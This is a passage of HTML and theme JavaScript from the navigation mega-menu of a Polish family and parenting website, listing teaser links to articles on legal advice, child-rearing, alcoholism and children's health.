href=\"http:\/\/www.erodzina.com\/wieczna-mlodosc-czyli-przemijanie-z-klasa\/\" rel=\"bookmark\" title=\"Wieczna m\u0142odo\u015b\u0107 czyli przemijanie z klas\u0105\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/heron_zaklad_pogrzebowy_warszawa-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/heron_zaklad_pogrzebowy_warszawa-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/heron_zaklad_pogrzebowy_warszawa-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/heron_zaklad_pogrzebowy_warszawa-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Wieczna m\u0142odo\u015b\u0107 czyli przemijanie z klas\u0105\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/porady-prawne\/\" class=\"td-post-category\">Porady prawne<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/wieczna-mlodosc-czyli-przemijanie-z-klasa\/\" rel=\"bookmark\" title=\"Wieczna m\u0142odo\u015b\u0107 czyli przemijanie z klas\u0105\">Wieczna m\u0142odo\u015b\u0107 czyli przemijanie z klas\u0105<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-07-30T16:45:04+00:00\" >30 lipca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_2_5c5e20b7819de","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_2_5c5e20b7819de));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 27;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/interaktywna-rzeczywistosc-nadchodzi-rewolucja-edukacji\/\" rel=\"bookmark\" title=\"Interaktywna rzeczywisto\u015b\u0107: nadchodzi rewolucja w edukacji?\"><img width=\"228\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/karty.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/karty.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/karty-300x257.jpg 300w\" sizes=\"(max-width: 228px) 100vw, 228px\" alt=\"\" title=\"Interaktywna rzeczywisto\u015b\u0107: nadchodzi rewolucja w edukacji?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/wychowanie-dziecka\/\" class=\"td-post-category\">Wychowanie dziecka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/interaktywna-rzeczywistosc-nadchodzi-rewolucja-edukacji\/\" rel=\"bookmark\" title=\"Interaktywna rzeczywisto\u015b\u0107: nadchodzi rewolucja w edukacji?\">Interaktywna rzeczywisto\u015b\u0107: nadchodzi rewolucja w edukacji?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2017-07-26T10:10:01+00:00\" >26 lipca 2017<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/3-nawyki-finansowe-ktore-mozesz-zaszczepic-dziecku\/\" rel=\"bookmark\" title=\"3 nawyki finansowe, kt\u00f3re mo\u017cesz zaszczepi\u0107 w dziecku\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/03\/eurobank-3-nawyki-finansowe-ktore-chcesz-zaszczepic-w-dziecku.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/03\/eurobank-3-nawyki-finansowe-ktore-chcesz-zaszczepic-w-dziecku.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/03\/eurobank-3-nawyki-finansowe-ktore-chcesz-zaszczepic-w-dziecku-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/03\/eurobank-3-nawyki-finansowe-ktore-chcesz-zaszczepic-w-dziecku-768x512.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/03\/eurobank-3-nawyki-finansowe-ktore-chcesz-zaszczepic-w-dziecku-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/03\/eurobank-3-nawyki-finansowe-ktore-chcesz-zaszczepic-w-dziecku-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"3 nawyki finansowe, kt\u00f3re mo\u017cesz zaszczepi\u0107 w dziecku\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/wychowanie-dziecka\/\" class=\"td-post-category\">Wychowanie dziecka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/3-nawyki-finansowe-ktore-mozesz-zaszczepic-dziecku\/\" rel=\"bookmark\" title=\"3 nawyki finansowe, kt\u00f3re mo\u017cesz zaszczepi\u0107 w dziecku\">3 nawyki finansowe, kt\u00f3re mo\u017cesz zaszczepi\u0107 w dziecku<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2017-03-14T16:55:52+00:00\" >14 marca 2017<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/3-aspekty-ktore-warto-zwrocic-uwage-przy-edukacji-dzieci\/\" rel=\"bookmark\" title=\"3 aspekty, na kt\u00f3re warto zwr\u00f3ci\u0107 uwag\u0119 przy edukacji dzieci\"><img width=\"260\" height=\"96\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/03\/edutorial.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/03\/edutorial.jpg 851w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/03\/edutorial-300x111.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/03\/edutorial-768x284.jpg 768w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"3 aspekty, na kt\u00f3re warto zwr\u00f3ci\u0107 uwag\u0119 przy edukacji dzieci\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/wychowanie-dziecka\/\" class=\"td-post-category\">Wychowanie dziecka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/3-aspekty-ktore-warto-zwrocic-uwage-przy-edukacji-dzieci\/\" rel=\"bookmark\" title=\"3 aspekty, na kt\u00f3re warto zwr\u00f3ci\u0107 uwag\u0119 przy edukacji dzieci\">3 aspekty, na kt\u00f3re warto zwr\u00f3ci\u0107 uwag\u0119 przy edukacji dzieci<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2016-03-30T19:06:34+00:00\" >30 marca 2016<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_2_5c5e20b7819de","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_2_5c5e20b7819de));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 75;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/akademia-przedsiebiorcy-kobieca-strona-biznesu\/\" rel=\"bookmark\" title=\"Akademia Przedsi\u0119biorcy \u2013 \u201eKobieca Strona Biznesu\u201d\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/akademia-przedsiebiorczosci-wbk-polfund-poznan2018-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/akademia-przedsiebiorczosci-wbk-polfund-poznan2018-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/akademia-przedsiebiorczosci-wbk-polfund-poznan2018-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/akademia-przedsiebiorczosci-wbk-polfund-poznan2018-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Akademia Przedsi\u0119biorcy \u2013 \u201eKobieca Strona Biznesu\u201d\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/wydarzenia\/\" class=\"td-post-category\">Wydarzenia<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/akademia-przedsiebiorcy-kobieca-strona-biznesu\/\" rel=\"bookmark\" title=\"Akademia Przedsi\u0119biorcy \u2013 \u201eKobieca Strona Biznesu\u201d\">Akademia Przedsi\u0119biorcy \u2013 \u201eKobieca Strona Biznesu\u201d<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-03-14T20:39:20+00:00\" >14 marca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/program-500-zmienia-polske\/\" rel=\"bookmark\" title=\"Jak program 500+ zmienia Polsk\u0119?\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/12\/tata-z-dzieckiem.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/12\/tata-z-dzieckiem.jpg 640w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/12\/tata-z-dzieckiem-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/12\/tata-z-dzieckiem-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/12\/tata-z-dzieckiem-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak program 500+ zmienia Polsk\u0119?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/wydarzenia\/\" class=\"td-post-category\">Wydarzenia<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/program-500-zmienia-polske\/\" rel=\"bookmark\" title=\"Jak program 500+ zmienia Polsk\u0119?\">Jak program 500+ zmienia Polsk\u0119?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2017-12-04T17:00:35+00:00\" >4 grudnia 2017<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/rekordowa-liczba-przedszkolakow-calej-polski-dowie-sie-dbac-o-srodowisko-naturalne\/\" rel=\"bookmark\" title=\"Rekordowa liczba przedszkolak\u00f3w z ca\u0142ej Polski dowie si\u0119,  jak dba\u0107 o \u015brodowisko naturalne\"><img width=\"260\" height=\"172\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/11\/Foto1_unsplash.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/11\/Foto1_unsplash.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/11\/Foto1_unsplash-300x199.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/11\/Foto1_unsplash-768x508.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/11\/Foto1_unsplash-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/11\/Foto1_unsplash-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Rekordowa liczba przedszkolak\u00f3w z ca\u0142ej Polski dowie si\u0119,  jak dba\u0107 o \u015brodowisko naturalne\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/wydarzenia\/\" class=\"td-post-category\">Wydarzenia<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/rekordowa-liczba-przedszkolakow-calej-polski-dowie-sie-dbac-o-srodowisko-naturalne\/\" rel=\"bookmark\" title=\"Rekordowa liczba przedszkolak\u00f3w z ca\u0142ej Polski dowie si\u0119,  jak dba\u0107 o \u015brodowisko naturalne\">Rekordowa liczba przedszkolak\u00f3w z ca\u0142ej Polski dowie si\u0119,  jak dba\u0107...<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2017-11-30T14:30:40+00:00\" >30 listopada 2017<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_2_5c5e20b7819de","td_hide_prev":true,"td_hide_next":false}));
                                    </script>
            <div class="td-container td_block_wrap td_block_mega_menu td_uid_2_5c5e20b7819de_rand td_with_ajax_pagination td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_2_5c5e20b7819de"><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="mega-menu-sub-cat-td_uid_2_5c5e20b7819de" id="td_uid_3_5c5e20b781d5a" data-td_block_id="td_uid_2_5c5e20b7819de" data-td_filter_value="63" href="http://www.erodzina.com/kategoria/zycie-i-rodzina/alkoholizm/">Alkoholizm</a><a class="mega-menu-sub-cat-td_uid_2_5c5e20b7819de" id="td_uid_4_5c5e20b781d8b" data-td_block_id="td_uid_2_5c5e20b7819de" data-td_filter_value="25" href="http://www.erodzina.com/kategoria/zycie-i-rodzina/dziecko-porady/">Dziecko porady</a><a class="mega-menu-sub-cat-td_uid_2_5c5e20b7819de" id="td_uid_5_5c5e20b781db3" data-td_block_id="td_uid_2_5c5e20b7819de" data-td_filter_value="67" href="http://www.erodzina.com/kategoria/zycie-i-rodzina/malzenstwo/">Małżeństwo</a><a class="mega-menu-sub-cat-td_uid_2_5c5e20b7819de" id="td_uid_6_5c5e20b781dd9" data-td_block_id="td_uid_2_5c5e20b7819de" data-td_filter_value="29" href="http://www.erodzina.com/kategoria/zycie-i-rodzina/porady-prawne/">Porady prawne</a><a class="mega-menu-sub-cat-td_uid_2_5c5e20b7819de" id="td_uid_7_5c5e20b781dfd" data-td_block_id="td_uid_2_5c5e20b7819de" data-td_filter_value="27" href="http://www.erodzina.com/kategoria/zycie-i-rodzina/wychowanie-dziecka/">Wychowanie dziecka</a><a class="mega-menu-sub-cat-td_uid_2_5c5e20b7819de" id="td_uid_8_5c5e20b781e20" data-td_block_id="td_uid_2_5c5e20b7819de" data-td_filter_value="75" href="http://www.erodzina.com/kategoria/zycie-i-rodzina/wydarzenia/">Wydarzenia</a><a class="cur-sub-cat mega-menu-sub-cat-td_uid_2_5c5e20b7819de mega-menu-cat-all" id="td_uid_9_5c5e20b781e43" data-td_block_id="td_uid_2_5c5e20b7819de" data-td_filter_value="" href="http://www.erodzina.com/kategoria/zycie-i-rodzina/">Wszystko Życie i Rodzina</a></div></div><div id="td_uid_2_5c5e20b7819de" class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/co-wiedziec-o-alimentach/" rel="bookmark" title="Co wiedzieć o alimentach?"><img width="260" height="177" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2019/01/b85d6bf66324cffacee01924e62d621e-260x177.png" alt="" title="Co wiedzieć o alimentach?"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/zycie-i-rodzina/porady-prawne/" class="td-post-category">Porady prawne</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/co-wiedziec-o-alimentach/" rel="bookmark" title="Co wiedzieć o alimentach?">Co wiedzieć o alimentach?</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-01-08T12:52:13+00:00">8 stycznia 2019</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/czym-jest-uzaleznienie-od-alkoholu-i-jak-leczyc-alkoholizm/" rel="bookmark" title="Czym jest uzależnienie od alkoholu i jak leczyć alkoholizm?"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2018/10/9029da7783d1b08a3b11b63d8bde3ac1-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2018/10/9029da7783d1b08a3b11b63d8bde3ac1-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2018/10/9029da7783d1b08a3b11b63d8bde3ac1-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2018/10/9029da7783d1b08a3b11b63d8bde3ac1-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Czym jest uzależnienie od alkoholu i jak leczyć alkoholizm?"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/zycie-i-rodzina/alkoholizm/" class="td-post-category">Alkoholizm</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/czym-jest-uzaleznienie-od-alkoholu-i-jak-leczyc-alkoholizm/" rel="bookmark" title="Czym jest uzależnienie od alkoholu i jak leczyć alkoholizm?">Czym jest uzależnienie od alkoholu i jak leczyć alkoholizm?</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-10-23T16:51:35+00:00">23 października 2018</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/jak-to-bylo-z-nauka-chodzenia/" rel="bookmark" title="Jak to było z nauką chodzenia?"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2018/10/nauka_chodzenia_001-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2018/10/nauka_chodzenia_001-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2018/10/nauka_chodzenia_001-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2018/10/nauka_chodzenia_001-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Jak to było z nauką chodzenia?"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/zycie-i-rodzina/dziecko-porady/" class="td-post-category">Dziecko porady</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/jak-to-bylo-z-nauka-chodzenia/" rel="bookmark" title="Jak to było z nauką chodzenia?">Jak to było z nauką chodzenia?</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-10-09T13:25:50+00:00">9 października 2018</time></span>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_2_5c5e20b7819de" data-td_block_id="td_uid_2_5c5e20b7819de"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_2_5c5e20b7819de" data-td_block_id="td_uid_2_5c5e20b7819de"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-5107"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/" class="sf-with-ul">Zdrowie<i class="td-icon-menu-down"></i></a>
<ul class="sub-menu" style="display: none; float: none; width: 20em;">
	<li class="menu-item-0" style="white-space: normal; float: left; width: 100%;"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_10_5c5e20b787cdf = new tdBlock();
block_td_uid_10_5c5e20b787cdf.id = "td_uid_10_5c5e20b787cdf";
block_td_uid_10_5c5e20b787cdf.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"1","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"preload","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"Wszystko","color_preset":"","border_top":"","class":"td_uid_10_5c5e20b787cdf_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_10_5c5e20b787cdf_rand","tdc_css_class_style":"td_uid_10_5c5e20b787cdf_rand_style","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_10_5c5e20b787cdf.td_column_number = "3";
block_td_uid_10_5c5e20b787cdf.block_type = "td_block_mega_menu";
block_td_uid_10_5c5e20b787cdf.post_count = "3";
block_td_uid_10_5c5e20b787cdf.found_posts = "807";
block_td_uid_10_5c5e20b787cdf.header_color = "";
block_td_uid_10_5c5e20b787cdf.ajax_pagination_infinite_stop = "";
block_td_uid_10_5c5e20b787cdf.max_num_pages = "269";
tdBlocksArray.push(block_td_uid_10_5c5e20b787cdf);
</script>            <script>
                var tmpObj = JSON.parse(JSON.stringify(block_td_uid_10_5c5e20b787cdf));
                tmpObj.is_ajax_running = true;
                var currentBlockObjSignature = JSON.stringify(tmpObj);
                tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/pneumokoki-jak-chronic-swoje-dziecko-przed-zakazeniem\/\" rel=\"bookmark\" title=\"Pneumokoki \u2013 jak chroni\u0107 swoje dziecko przed zaka\u017ceniem?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/stethoscope-1584223_1920-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/stethoscope-1584223_1920-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/stethoscope-1584223_1920-300x225.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/stethoscope-1584223_1920-768x576.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/stethoscope-1584223_1920-1024x768.jpg 1024w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/stethoscope-1584223_1920-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/stethoscope-1584223_1920-245x184.jpg 245w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/stethoscope-1584223_1920-640x480.jpg 640w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/stethoscope-1584223_1920-980x735.jpg 980w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Pneumokoki \u2013 jak chroni\u0107 swoje dziecko przed zaka\u017ceniem?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/zdrowie-dziecka\/\" class=\"td-post-category\">Zdrowie dziecka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/pneumokoki-jak-chronic-swoje-dziecko-przed-zakazeniem\/\" rel=\"bookmark\" title=\"Pneumokoki \u2013 jak chroni\u0107 swoje dziecko przed zaka\u017ceniem?\">Pneumokoki \u2013 jak chroni\u0107 swoje dziecko przed zaka\u017ceniem?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-31T14:00:37+00:00\" >31 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/co-wybrac-na-grype-ibuprofen-czy-paracetamol\/\" rel=\"bookmark\" title=\"Co wybra\u0107 na gryp\u0119 \u2013 ibuprofen czy paracetamol?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/bad6e7a94675118df6441cbe1953c87f-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/bad6e7a94675118df6441cbe1953c87f-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/bad6e7a94675118df6441cbe1953c87f-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/bad6e7a94675118df6441cbe1953c87f-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Co wybra\u0107 na gryp\u0119 \u2013 ibuprofen czy paracetamol?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/zdrowie-rodziny\/\" class=\"td-post-category\">Zdrowie rodziny<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/co-wybrac-na-grype-ibuprofen-czy-paracetamol\/\" rel=\"bookmark\" title=\"Co wybra\u0107 na gryp\u0119 \u2013 ibuprofen czy paracetamol?\">Co wybra\u0107 na gryp\u0119 \u2013 ibuprofen czy paracetamol?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-03T11:55:57+00:00\" >3 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/fundacja-dla-dzieci-chorych-na-nowotwor-do-ktorej-sie-zwrocic\/\" rel=\"bookmark\" title=\"Fundacja dla dzieci chorych na nowotw\u00f3r. Do kt\u00f3rej si\u0119 zwr\u00f3ci\u0107?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/walka_z_rakiem-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/walka_z_rakiem-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/walka_z_rakiem-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/walka_z_rakiem-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Fundacja dla dzieci chorych na nowotw\u00f3r. Do kt\u00f3rej si\u0119 zwr\u00f3ci\u0107?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/rak\/\" class=\"td-post-category\">Rak<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a 